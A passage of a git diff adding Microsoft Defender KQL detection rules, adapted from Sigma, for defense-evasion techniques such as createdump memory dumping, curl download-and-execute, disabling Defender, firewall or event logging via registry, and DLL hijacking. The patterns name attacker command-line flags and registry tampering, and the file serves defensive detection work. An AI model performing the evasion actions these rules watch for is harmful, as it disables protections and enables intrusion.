"ConvertTo-SecureString" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/createdump_process_dump.kql b/KQL/rules/Defense Evasion/createdump_process_dump.kql new file mode 100644 index 00000000..d76aab5b --- /dev/null +++ b/KQL/rules/Defense Evasion/createdump_process_dump.kql @@ -0,0 +1,12 @@ +// Title: CreateDump Process Dump +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-01-04 +// Level: high +// Description: Detects uses of the createdump.exe LOLOBIN utility to dump process memory +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036, attack.t1003.001, attack.credential-access +// False Positives: +// - Command lines that use the same flags + +DeviceProcessEvents +| where (ProcessCommandLine contains " -u " or ProcessCommandLine contains " --full " or ProcessCommandLine contains " -f " or ProcessCommandLine contains " --name " or ProcessCommandLine contains ".dmp ") and (FolderPath endswith "\\createdump.exe" or ProcessVersionInfoOriginalFileName =~ "FX_VER_INTERNALNAME_STR") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/creation_of_non_existent_system_dll.kql b/KQL/rules/Defense Evasion/creation_of_non_existent_system_dll.kql new file mode 100644 index 00000000..42e0e821 --- /dev/null +++ b/KQL/rules/Defense Evasion/creation_of_non_existent_system_dll.kql @@ -0,0 +1,12 @@ +// Title: Creation Of Non-Existent System DLL +// Author: Nasreddine Bencherchali (Nextron Systems), fornotes +// Date: 2022-12-01 +// Level: medium +// Description: Detects the creation of system DLLs that are usually not present on the system (or at least not in system directories). +Usually this technique is used to achieve DLL hijacking. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 + +DeviceFileEvents +| where FolderPath endswith ":\\Windows\\System32\\TSMSISrv.dll" or FolderPath endswith ":\\Windows\\System32\\TSVIPSrv.dll" or FolderPath endswith ":\\Windows\\System32\\wbem\\wbemcomn.dll" or FolderPath endswith ":\\Windows\\System32\\WLBSCTRL.dll" or FolderPath endswith ":\\Windows\\System32\\wow64log.dll" or FolderPath endswith ":\\Windows\\System32\\WptsExtensions.dll" or FolderPath endswith "\\SprintCSP.dll" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/curl_download_and_execute_combination.kql b/KQL/rules/Defense Evasion/curl_download_and_execute_combination.kql new file mode 100644 index 00000000..fc6c6297 --- /dev/null +++ b/KQL/rules/Defense Evasion/curl_download_and_execute_combination.kql @@ -0,0 +1,10 @@ +// Title: Curl Download And Execute Combination +// Author: Sreeman, Nasreddine Bencherchali (Nextron Systems) +// Date: 2020-01-13 +// Level: high +// Description: Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, attack.command-and-control, attack.t1105 + +DeviceProcessEvents +| where (ProcessCommandLine contains "curl " and ProcessCommandLine contains "http" and ProcessCommandLine contains "-o" and ProcessCommandLine contains "&") and (ProcessCommandLine contains " -c " or ProcessCommandLine contains " /c " or ProcessCommandLine contains " –c " or ProcessCommandLine contains " —c " or ProcessCommandLine contains " ―c ") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/custom_file_open_handler_executes_powershell.kql b/KQL/rules/Defense Evasion/custom_file_open_handler_executes_powershell.kql new file mode 100644 index 00000000..875b8de9 --- /dev/null +++ b/KQL/rules/Defense Evasion/custom_file_open_handler_executes_powershell.kql @@ -0,0 +1,10 @@ +// Title: Custom File Open Handler Executes PowerShell +// Author: CD_R0M_ +// Date: 2022-06-11 +// Level: high +// Description: Detects the abuse of custom file open handler, executing powershell +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1202 + +DeviceRegistryEvents +| where (RegistryValueData contains "powershell" and RegistryValueData contains "-command") and RegistryKey endswith "shell\\open\\command*" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/decode_base64_encoded_text.kql b/KQL/rules/Defense Evasion/decode_base64_encoded_text.kql new file mode 100644 index 00000000..8285cc90 --- /dev/null +++ b/KQL/rules/Defense Evasion/decode_base64_encoded_text.kql @@ -0,0 +1,12 @@ +// Title: Decode Base64 Encoded Text +// Author: Daniil Yugoslavskiy, oscd.community +// Date: 2020-10-19 +// Level: low +// Description: Detects usage of base64 utility to decode arbitrary base64-encoded text +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027 +// False Positives: +// - Legitimate activities + +DeviceProcessEvents +| where ProcessCommandLine contains "-d" and FolderPath endswith "/base64" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/decode_base64_encoded_text_macos.kql b/KQL/rules/Defense Evasion/decode_base64_encoded_text_macos.kql new file mode 100644 index 00000000..305525e0 --- /dev/null +++ b/KQL/rules/Defense Evasion/decode_base64_encoded_text_macos.kql @@ -0,0 +1,12 @@ +// Title: Decode Base64 Encoded Text -MacOs +// Author: Daniil Yugoslavskiy, oscd.community +// Date: 2020-10-19 +// Level: low +// Description: Detects usage of base64 utility to decode arbitrary base64-encoded text +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027 +// False Positives: +// - Legitimate activities + +DeviceProcessEvents +| where ProcessCommandLine contains "-d" and FolderPath =~ "/usr/bin/base64" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/delete_defender_scan_shellex_context_menu_registry_key.kql b/KQL/rules/Defense Evasion/delete_defender_scan_shellex_context_menu_registry_key.kql new file mode 100644 index 00000000..7598c0bf --- /dev/null +++ b/KQL/rules/Defense Evasion/delete_defender_scan_shellex_context_menu_registry_key.kql @@ -0,0 +1,12 @@ +// Title: Delete Defender Scan ShellEx Context Menu Registry Key +// Author: Matt Anderson (Huntress) +// Date: 2025-07-11 +// Level: medium +// Description: Detects deletion of registry key that adds 'Scan with Defender' option in context menu. Attackers may use this to make it harder for users to scan files that are suspicious. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Unlikely as this weakens defenses and normally would not be done even if using another AV. + +DeviceRegistryEvents +| where RegistryKey contains "shellex\\ContextMenuHandlers\\EPP" and (not((InitiatingProcessFolderPath endswith "\\MsMpEng.exe" and (InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Windows Defender\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Windows Defender\\")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/devicecredentialdeployment_execution.kql b/KQL/rules/Defense Evasion/devicecredentialdeployment_execution.kql new file mode 100644 index 00000000..938e10c9 --- /dev/null +++ b/KQL/rules/Defense Evasion/devicecredentialdeployment_execution.kql @@ -0,0 +1,13 @@ +// Title: DeviceCredentialDeployment Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-19 +// Level: medium +// Description: Detects the execution of DeviceCredentialDeployment to hide a process from view. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where FolderPath endswith "\\DeviceCredentialDeployment.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/devtoolslauncher_exe_executes_specified_binary.kql b/KQL/rules/Defense Evasion/devtoolslauncher_exe_executes_specified_binary.kql new file mode 100644 index 00000000..f4b9513a --- /dev/null +++ b/KQL/rules/Defense Evasion/devtoolslauncher_exe_executes_specified_binary.kql @@ -0,0 +1,12 @@ +// Title: Devtoolslauncher.exe Executes Specified Binary +// Author: Beyu Denis, oscd.community (rule), @_felamos (idea) +// Date: 2019-10-12 +// Level: high +// Description: The Devtoolslauncher.exe executes other binary +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Legitimate use of devtoolslauncher.exe by legitimate user + +DeviceProcessEvents +| where ProcessCommandLine contains "LaunchForDeploy" and FolderPath endswith "\\devtoolslauncher.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/diagnostic_library_sdiageng_dll_loaded_by_msdt_exe.kql b/KQL/rules/Defense Evasion/diagnostic_library_sdiageng_dll_loaded_by_msdt_exe.kql new file mode 100644 index 00000000..c691ea5e --- /dev/null +++ b/KQL/rules/Defense Evasion/diagnostic_library_sdiageng_dll_loaded_by_msdt_exe.kql @@ -0,0 +1,10 @@ +// Title: Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE +// Author: Greg (rule) +// Date: 2022-06-17 +// Level: high +// Description: Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the "sdiageng.dll" library +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1202, cve.2022-30190 + +DeviceImageLoadEvents +| where FolderPath endswith "\\sdiageng.dll" and InitiatingProcessFolderPath endswith "\\msdt.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/directory_removal_via_rmdir.kql b/KQL/rules/Defense Evasion/directory_removal_via_rmdir.kql new file mode 100644 index 00000000..0705d2cf --- /dev/null +++ b/KQL/rules/Defense Evasion/directory_removal_via_rmdir.kql @@ -0,0 +1,14 @@ +// Title: Directory Removal Via Rmdir +// Author: frack113 +// Date: 2022-01-15 +// Level: low +// Description: Detects execution of the builtin "rmdir" command in order to delete directories. +Adversaries may delete files left behind by the actions of their intrusion activity. +Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. +Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.004 + +DeviceProcessEvents +| where (ProcessCommandLine contains "/s" or ProcessCommandLine contains "/q") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") and ProcessCommandLine contains "rmdir" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/directory_service_restore_mode_dsrm_registry_value_tampering.kql b/KQL/rules/Defense Evasion/directory_service_restore_mode_dsrm_registry_value_tampering.kql new file mode 100644 index 00000000..969916f8 --- /dev/null +++ b/KQL/rules/Defense Evasion/directory_service_restore_mode_dsrm_registry_value_tampering.kql @@ -0,0 +1,16 @@ +// Title: Directory Service Restore Mode(DSRM) Registry Value Tampering +// Author: Nischal Khadgi +// Date: 2024-07-11 +// Level: high +// Description: Detects changes to "DsrmAdminLogonBehavior" registry value. +During a Domain Controller (DC) promotion, administrators create a Directory Services Restore Mode (DSRM) local administrator account with a password that rarely changes. The DSRM account is an “Administrator” account that logs in with the DSRM mode when the server is booting up to restore AD backups or recover the server from a failure. +Attackers could abuse DSRM account to maintain their persistence and access to the organization's Active Directory. +If the "DsrmAdminLogonBehavior" value is set to "0", the administrator account can only be used if the DC starts in DSRM. +If the "DsrmAdminLogonBehavior" value is set to "1", the administrator account can only be used if the local AD DS service is stopped. +If the "DsrmAdminLogonBehavior" value is set to "2", the administrator account can always be used. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.credential-access, attack.persistence, attack.t1556 + +DeviceRegistryEvents +| where RegistryKey endswith "\\Control\\Lsa\\DsrmAdminLogonBehavior" and (not(RegistryValueData =~ "DWORD (0x00000000)")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disable_administrative_share_creation_at_startup.kql b/KQL/rules/Defense Evasion/disable_administrative_share_creation_at_startup.kql new file mode 100644 index 00000000..acdb950c --- /dev/null +++ b/KQL/rules/Defense Evasion/disable_administrative_share_creation_at_startup.kql @@ -0,0 +1,10 @@ +// Title: Disable Administrative Share Creation at Startup +// Author: frack113 +// Date: 2022-01-16 +// Level: medium +// Description: Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.005 + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "\\Services\\LanmanServer\\Parameters*" and (RegistryKey endswith "\\AutoShareWks" or RegistryKey endswith "\\AutoShareServer") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disable_exploit_guard_network_protection_on_windows_defender.kql b/KQL/rules/Defense Evasion/disable_exploit_guard_network_protection_on_windows_defender.kql new file mode 100644 index 00000000..98c891e0 --- /dev/null +++ b/KQL/rules/Defense Evasion/disable_exploit_guard_network_protection_on_windows_defender.kql @@ -0,0 +1,10 @@ +// Title: Disable Exploit Guard Network Protection on Windows Defender +// Author: Austin Songer @austinsonger +// Date: 2021-08-04 +// Level: medium +// Description: Detects disabling Windows Defender Exploit Guard Network Protection +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (00000001)" and RegistryKey contains "SOFTWARE\\Policies\\Microsoft\\Windows Defender Security Center\\App and Browser protection\\DisallowExploitProtectionOverride" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disable_macro_runtime_scan_scope.kql b/KQL/rules/Defense Evasion/disable_macro_runtime_scan_scope.kql new file mode 100644 index 00000000..557ba58a --- /dev/null +++ b/KQL/rules/Defense Evasion/disable_macro_runtime_scan_scope.kql @@ -0,0 +1,10 @@ +// Title: Disable Macro Runtime Scan Scope +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-25 +// Level: high +// Description: Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\SOFTWARE*" and RegistryKey endswith "\\Microsoft\\Office*" and RegistryKey contains "\\Common\\Security") and RegistryKey endswith "\\MacroRuntimeScanScope" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disable_microsoft_defender_firewall_via_registry.kql b/KQL/rules/Defense Evasion/disable_microsoft_defender_firewall_via_registry.kql new file mode 100644 index 00000000..13fdd341 --- /dev/null +++ b/KQL/rules/Defense Evasion/disable_microsoft_defender_firewall_via_registry.kql @@ -0,0 +1,10 @@ +// Title: Disable Microsoft Defender Firewall via Registry +// Author: frack113 +// Date: 2022-01-09 +// Level: medium +// Description: Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.004 + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "\\Services\\SharedAccess\\Parameters\\FirewallPolicy*" and RegistryKey endswith "\\EnableFirewall" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disable_or_stop_services.kql b/KQL/rules/Defense Evasion/disable_or_stop_services.kql new file mode 100644 index 00000000..05d94219 --- /dev/null +++ b/KQL/rules/Defense Evasion/disable_or_stop_services.kql @@ -0,0 +1,12 @@ +// Title: Disable Or Stop Services +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-15 +// Level: medium +// Description: Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where (ProcessCommandLine contains "stop" or ProcessCommandLine contains "disable") and (FolderPath endswith "/service" or FolderPath endswith "/systemctl" or FolderPath endswith "/chkconfig") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disable_privacy_settings_experience_in_registry.kql b/KQL/rules/Defense Evasion/disable_privacy_settings_experience_in_registry.kql new file mode 100644 index 00000000..287d5e1d --- /dev/null +++ b/KQL/rules/Defense Evasion/disable_privacy_settings_experience_in_registry.kql @@ -0,0 +1,12 @@ +// Title: Disable Privacy Settings Experience in Registry +// Author: frack113 +// Date: 2022-10-02 +// Level: medium +// Description: Detects registry modifications that disable Privacy Settings Experience +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Legitimate admin script + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\Windows\\OOBE\\DisablePrivacyExperience" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disable_pua_protection_on_windows_defender.kql b/KQL/rules/Defense Evasion/disable_pua_protection_on_windows_defender.kql new file mode 100644 index 00000000..139d72bb --- /dev/null +++ b/KQL/rules/Defense Evasion/disable_pua_protection_on_windows_defender.kql @@ -0,0 +1,10 @@ +// Title: Disable PUA Protection on Windows Defender +// Author: Austin Songer @austinsonger +// Date: 2021-08-04 +// Level: high +// Description: Detects disabling Windows Defender PUA protection +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Policies\\Microsoft\\Windows Defender\\PUAProtection" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disable_security_tools.kql b/KQL/rules/Defense Evasion/disable_security_tools.kql new file mode 100644 index 00000000..a37b7aed --- /dev/null +++ b/KQL/rules/Defense Evasion/disable_security_tools.kql @@ -0,0 +1,12 @@ +// Title: Disable Security Tools +// Author: Daniil Yugoslavskiy, oscd.community +// Date: 2020-10-19 +// Level: medium +// Description: Detects disabling security tools +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Legitimate activities + +DeviceProcessEvents +| where ((ProcessCommandLine contains "unload" and FolderPath =~ "/bin/launchctl") and (ProcessCommandLine contains "com.objective-see.lulu.plist" or ProcessCommandLine contains "com.objective-see.blockblock.plist" or ProcessCommandLine contains "com.google.santad.plist" or ProcessCommandLine contains "com.carbonblack.defense.daemon.plist" or ProcessCommandLine contains "com.carbonblack.daemon.plist" or ProcessCommandLine contains "at.obdev.littlesnitchd.plist" or ProcessCommandLine contains "com.tenablesecurity.nessusagent.plist" or ProcessCommandLine contains "com.opendns.osx.RoamingClientConfigUpdater.plist" or ProcessCommandLine contains "com.crowdstrike.falcond.plist" or ProcessCommandLine contains "com.crowdstrike.userdaemon.plist" or ProcessCommandLine contains "osquery" or ProcessCommandLine contains "filebeat" or ProcessCommandLine contains "auditbeat" or ProcessCommandLine contains "packetbeat" or ProcessCommandLine contains "td-agent")) or (ProcessCommandLine contains "disable" and FolderPath =~ "/usr/sbin/spctl") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disable_tamper_protection_on_windows_defender.kql b/KQL/rules/Defense Evasion/disable_tamper_protection_on_windows_defender.kql new file mode 100644 index 00000000..06ad0973 --- /dev/null +++ b/KQL/rules/Defense Evasion/disable_tamper_protection_on_windows_defender.kql @@ -0,0 +1,10 @@ +// Title: Disable Tamper Protection on Windows Defender +// Author: Austin Songer @austinsonger +// Date: 2021-08-04 +// Level: medium +// Description: Detects disabling Windows Defender Tamper Protection +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 + +DeviceRegistryEvents +| where (RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows Defender\\Features\\TamperProtection") and (not(((InitiatingProcessFolderPath endswith "\\MsMpEng.exe" and InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\") or InitiatingProcessFolderPath =~ "C:\\Program Files\\Windows Defender\\MsMpEng.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disable_windows_defender_av_security_monitoring.kql b/KQL/rules/Defense Evasion/disable_windows_defender_av_security_monitoring.kql new file mode 100644 index 00000000..751507f4 --- /dev/null +++ b/KQL/rules/Defense Evasion/disable_windows_defender_av_security_monitoring.kql @@ -0,0 +1,12 @@ +// Title: Disable Windows Defender AV Security Monitoring +// Author: ok @securonix invrep-de, oscd.community, frack113 +// Date: 2020-10-12 +// Level: high +// Description: Detects attackers attempting to disable Windows Defender using Powershell +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice. + +DeviceProcessEvents +| where (((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "-DisableBehaviorMonitoring $true" or ProcessCommandLine contains "-DisableRuntimeMonitoring $true")) or ((FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe") and ((ProcessCommandLine contains "delete" and ProcessCommandLine contains "WinDefend") or (ProcessCommandLine contains "config" and ProcessCommandLine contains "WinDefend" and ProcessCommandLine contains "start=disabled") or (ProcessCommandLine contains "stop" and ProcessCommandLine contains "WinDefend"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disable_windows_defender_functionalities_via_registry_keys.kql b/KQL/rules/Defense Evasion/disable_windows_defender_functionalities_via_registry_keys.kql new file mode 100644 index 00000000..b11de363 --- /dev/null +++ b/KQL/rules/Defense Evasion/disable_windows_defender_functionalities_via_registry_keys.kql @@ -0,0 +1,13 @@ +// Title: Disable Windows Defender Functionalities Via Registry Keys +// Author: AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali, Swachchhanda Shrawan Poudel +// Date: 2022-08-01 +// Level: high +// Description: Detects when attackers or tools disable Windows Defender functionalities via the Windows registry +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Administrator actions via the Windows Defender interface +// - Third party Antivirus + +DeviceRegistryEvents +| where (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows Defender*" or RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\Windows Defender Security Center*" or RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\Windows Defender*") and ((RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\DisallowExploitProtectionOverride" or RegistryKey endswith "\\Features\\TamperProtection" or RegistryKey endswith "\\MpEngine\\MpEnablePus" or RegistryKey endswith "\\PUAProtection" or RegistryKey endswith "\\Signature Update\\ForceUpdateFromMU" or RegistryKey endswith "\\SpyNet\\SpynetReporting" or RegistryKey endswith "\\SpyNet\\SubmitSamplesConsent" or RegistryKey endswith "\\Windows Defender Exploit Guard\\Controlled Folder Access\\EnableControlledFolderAccess")) or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "\\DisableAntiSpyware" or RegistryKey endswith "\\DisableAntiVirus" or RegistryKey endswith "\\DisableBehaviorMonitoring" or RegistryKey endswith "\\DisableBlockAtFirstSeen" or RegistryKey endswith "\\DisableEnhancedNotifications" or RegistryKey endswith "\\DisableIntrusionPreventionSystem" or RegistryKey endswith "\\DisableIOAVProtection" or RegistryKey endswith "\\DisableOnAccessProtection" or RegistryKey endswith "\\DisableRealtimeMonitoring" or RegistryKey endswith "\\DisableScanOnRealtimeEnable" or RegistryKey endswith "\\DisableScriptScanning"))) and (not((InitiatingProcessFolderPath endswith "\\sepWscSvc64.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disable_windows_event_logging_via_registry.kql b/KQL/rules/Defense Evasion/disable_windows_event_logging_via_registry.kql new file mode 100644 index 00000000..e357894c --- /dev/null +++ b/KQL/rules/Defense Evasion/disable_windows_event_logging_via_registry.kql @@ -0,0 +1,12 @@ +// Title: Disable Windows Event Logging Via Registry +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-04 +// Level: high +// Description: Detects tampering with the "Enabled" registry key in order to disable Windows logging of a Windows event channel +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.002 +// False Positives: +// - Rare falsepositives may occur from legitimate administrators disabling specific event log for troubleshooting + +DeviceRegistryEvents +| where (RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels*" and RegistryKey endswith "\\Enabled") and (not(((InitiatingProcessFolderPath endswith "\\TiWorker.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\winsxs\\") or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\svchost.exe" and (RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-FileInfoMinifilter" or RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-ASN1*" or RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-Kernel-AppCompat*" or RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-Runtime\\Error*" or RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-CAPI2/Operational*")) or (InitiatingProcessFolderPath =~ "C:\\Windows\\servicing\\TrustedInstaller.exe" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-Compat-Appraiser") or InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\wevtutil.exe"))) and (not((InitiatingProcessFolderPath =~ "" or isnull(InitiatingProcessFolderPath)))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disable_windows_firewall_by_registry.kql b/KQL/rules/Defense Evasion/disable_windows_firewall_by_registry.kql new file mode 100644 index 00000000..ba01e570 --- /dev/null +++ b/KQL/rules/Defense Evasion/disable_windows_firewall_by_registry.kql @@ -0,0 +1,10 @@ +// Title: Disable Windows Firewall by Registry +// Author: frack113 +// Date: 2022-08-19 +// Level: medium +// Description: Detect set EnableFirewall to 0 to disable the Windows firewall +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.004 + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\WindowsFirewall\\StandardProfile\\EnableFirewall" or RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\WindowsFirewall\\DomainProfile\\EnableFirewall") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disable_windows_iis_http_logging.kql b/KQL/rules/Defense Evasion/disable_windows_iis_http_logging.kql new file mode 100644 index 00000000..75cd9ac3 --- /dev/null +++ b/KQL/rules/Defense Evasion/disable_windows_iis_http_logging.kql @@ -0,0 +1,10 @@ +// Title: Disable Windows IIS HTTP Logging +// Author: frack113 +// Date: 2022-01-09 +// Level: high +// Description: Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.002 + +DeviceProcessEvents +| where (ProcessCommandLine contains "set" and ProcessCommandLine contains "config" and ProcessCommandLine contains "section:httplogging" and ProcessCommandLine contains "dontLog:true") and (FolderPath endswith "\\appcmd.exe" or ProcessVersionInfoOriginalFileName =~ "appcmd.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disabled_ie_security_features.kql b/KQL/rules/Defense Evasion/disabled_ie_security_features.kql new file mode 100644 index 00000000..9e582b93 --- /dev/null +++ b/KQL/rules/Defense Evasion/disabled_ie_security_features.kql @@ -0,0 +1,10 @@ +// Title: Disabled IE Security Features +// Author: Florian Roth (Nextron Systems) +// Date: 2020-06-19 +// Level: high +// Description: Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 + +DeviceProcessEvents +| where (ProcessCommandLine contains " -name IEHarden " and ProcessCommandLine contains " -value 0 ") or (ProcessCommandLine contains " -name DEPOff " and ProcessCommandLine contains " -value 1 ") or (ProcessCommandLine contains " -name DisableFirstRunCustomize " and ProcessCommandLine contains " -value 2 ") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disabled_volume_snapshots.kql b/KQL/rules/Defense Evasion/disabled_volume_snapshots.kql new file mode 100644 index 00000000..943826de --- /dev/null +++ b/KQL/rules/Defense Evasion/disabled_volume_snapshots.kql @@ -0,0 +1,12 @@ +// Title: Disabled Volume Snapshots +// Author: Florian Roth (Nextron Systems) +// Date: 2021-01-28 +// Level: high +// Description: Detects commands that temporarily turn off Volume Snapshots +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Legitimate administration + +DeviceProcessEvents +| where ProcessCommandLine contains "\\Services\\VSS\\Diag" and ProcessCommandLine contains "/d Disabled" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disabled_windows_defender_eventlog.kql b/KQL/rules/Defense Evasion/disabled_windows_defender_eventlog.kql new file mode 100644 index 00000000..557e0e64 --- /dev/null +++ b/KQL/rules/Defense Evasion/disabled_windows_defender_eventlog.kql @@ -0,0 +1,12 @@ +// Title: Disabled Windows Defender Eventlog +// Author: Florian Roth (Nextron Systems) +// Date: 2022-07-04 +// Level: high +// Description: Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Other Antivirus software installations could cause Windows to disable that eventlog (unknown) + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-Windows Defender/Operational\\Enabled" \ No newline at end of 